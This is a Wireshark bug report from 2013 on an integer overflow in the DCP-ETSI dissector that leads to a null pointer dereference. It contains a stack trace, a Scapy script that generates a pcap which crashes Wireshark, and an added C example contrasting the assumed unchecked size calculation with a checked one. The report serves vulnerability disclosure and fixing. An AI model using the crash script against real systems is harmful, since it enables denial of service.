Wireshark-bugs: [Wireshark-bugs] [Bug 8540] New: Integer Overflow -> Null Pointer Dereference pa
Date: Fri, 29 Mar 2013 18:30:25 +0000
Bug ID 8540
Summary Integer Overflow -> Null Pointer Dereference packet-dcp-etsi.c
Classification Unclassified
Product Wireshark
Version 1.8.6
Hardware x86
OS Linux (other)
Status UNCONFIRMED
Severity Major
Priority Low
Component Dissection engine (libwireshark)
Assignee bugzilla-admin@wireshark.org
Reporter evan.p.jensen@gmail.com

Created attachment 10504 [details]
pcap that will crash wireshark

Build Information:

--
Misuse of integers in packet-dcp-etsi.c allows for an argument of 0 to be
passed to g_malloc which will return a null pointer. The program will crash
when trying to use that memory.


decoded_size is calculated on line 274 and can overflow
decoded_size is passed to g_malloc on line 350, g_malloc returns a null ptr
That null ptr is used in rs_deinterleave to poor effect. 

Stacktrace:

#0  0x00007ffff4d90feb in rs_deinterleave (input=0x1f51f10 "", output=0x0,
plen=256, fcount=256) at packet-dcp-etsi.c:218
#1  0x00007ffff4d91605 in dissect_pft_fec_detailed (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, 
    seq=9156, offset=20, plen=256, fec=1, rsk=255, rsz=71, fdx=0x1ee1750) at
packet-dcp-etsi.c:351
#2  0x00007ffff4d91824 in dissect_pft_fragmented (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, seq=9156, 
    offset=20, plen=256, fec=1, rsk=255, rsz=71) at packet-dcp-etsi.c:411
#3  0x00007ffff4d91e61 in dissect_pft (tvb=0x1f1a5e0, pinfo=0x7fffffffd960,
tree=0x0) at packet-dcp-etsi.c:525
#4  0x00007ffff4b0d92a in call_dissector_through_handle (handle=0x1851510,
tvb=0x1f1a5e0, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:433
#5  0x00007ffff4b0daf7 in call_dissector_work (handle=0x1851510, tvb=0x1f1a5e0,
pinfo_arg=0x7fffffffd960, tree=0x0, 
    add_proto_name=1) at packet.c:524
#6  0x00007ffff4b0e8f9 in dissector_try_string (sub_dissectors=0xbd12a0,
string=0x7fffe1ae40a8 "PF", tvb=0x1f1a5e0, 
    pinfo=0x7fffffffd960, tree=0x0) at packet.c:1202
#7  0x00007ffff4d90f95 in dissect_dcp_etsi (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0) at packet-dcp-etsi.c:200
#8  0x00007ffff4b0f5cd in dissector_try_heuristic (sub_dissectors=0x9766b0,
tvb=0x1f1a5e0, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:1733
#9  0x00007ffff53609b6 in decode_udp_ports (tvb=0x1f1a640, offset=8,
pinfo=0x7fffffffd960, tree=0x0, uh_sport=42404, 
    uh_dport=55935, uh_ulen=284) at packet-udp.c:281


Script to generate packets:
from scapy.all import *
from struct import pack
packets=[]
top=IP(dst='127.0.0.1')/UDP(dport=55935,sport=42404)

# one UDP payload per fragment index, each with the same fixed header fields
for i in range(1,0x100):
    packets.append(top/(pack(">HHBHBBBHBBH",0x5046,0x23c4, 0x00,i,
                             0x00,0x01,0x00, 0xffff, 0xff,0x47, 0x4547)+'A'*0x104))

wrpcap('lol.pcap',packets)
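The size bug the report describes, as an added C example that is not Wireshark's code: it assumes, from the plen=256 and fcount=256 in the stack trace, that the buffer size is the product of plen and fcount held in a 16-bit variable, so 256*256 wraps to 0 and the allocator (g_malloc returns NULL for a 0-byte request) hands a null buffer to the deinterleaver. The checked variant computes in a wide type and rejects both overflow and a zero result before any allocation. The names decoded_size_unchecked, decoded_size_checked, checked_size_or_zero, unchecked_path_yields_null and alloc_like_g_malloc are constructed for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Unchecked (assumed shape of the bug): the product of two 16-bit values is
 * stored back into a 16-bit variable. 256 * 256 = 0x10000 does not fit and
 * is truncated to 0. */
uint16_t decoded_size_unchecked(uint16_t plen, uint16_t fcount)
{
    uint16_t decoded_size = plen * fcount; /* int arithmetic, then truncated */
    return decoded_size;
}

/* Checked: compute in a wide type, refuse overflow and a zero result so the
 * allocation can never be asked for 0 bytes. */
bool decoded_size_checked(uint16_t plen, uint16_t fcount, uint32_t *out)
{
    uint64_t product = (uint64_t)plen * (uint64_t)fcount;
    if (product == 0 || product > UINT32_MAX)
        return false;
    *out = (uint32_t)product;
    return true;
}

/* Convenience wrapper: the checked size, or 0 when the input is rejected. */
uint32_t checked_size_or_zero(uint16_t plen, uint16_t fcount)
{
    uint32_t size;
    return decoded_size_checked(plen, fcount, &size) ? size : 0;
}

/* Stand-in for g_malloc, which (per the GLib documentation) returns NULL when
 * asked for 0 bytes. Real g_malloc aborts on allocation failure; that is not
 * modelled here. */
static void *alloc_like_g_malloc(size_t n)
{
    return n == 0 ? NULL : malloc(n);
}

/* Returns 1 if the unchecked path would hand a NULL buffer to the
 * deinterleaver for these header values, 0 otherwise. */
int unchecked_path_yields_null(uint16_t plen, uint16_t fcount)
{
    void *buf = alloc_like_g_malloc(decoded_size_unchecked(plen, fcount));
    int is_null = (buf == NULL);
    free(buf); /* free(NULL) is a no-op */
    return is_null;
}

int main(void)
{
    uint16_t plen = 256, fcount = 256; /* values taken from the stack trace */
    printf("unchecked size: %u\n", decoded_size_unchecked(plen, fcount));
    printf("unchecked path hands NULL to the deinterleaver: %s\n",
           unchecked_path_yields_null(plen, fcount) ? "yes" : "no");
    printf("checked size: %u (0 = rejected)\n",
           checked_size_or_zero(plen, fcount));
    return 0;
}
```

With the trace's values the unchecked size is 0 and the buffer is NULL; the checked path returns 65536, and a request that would produce a zero-length buffer (for instance fcount=0) is rejected before the allocator is ever called.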
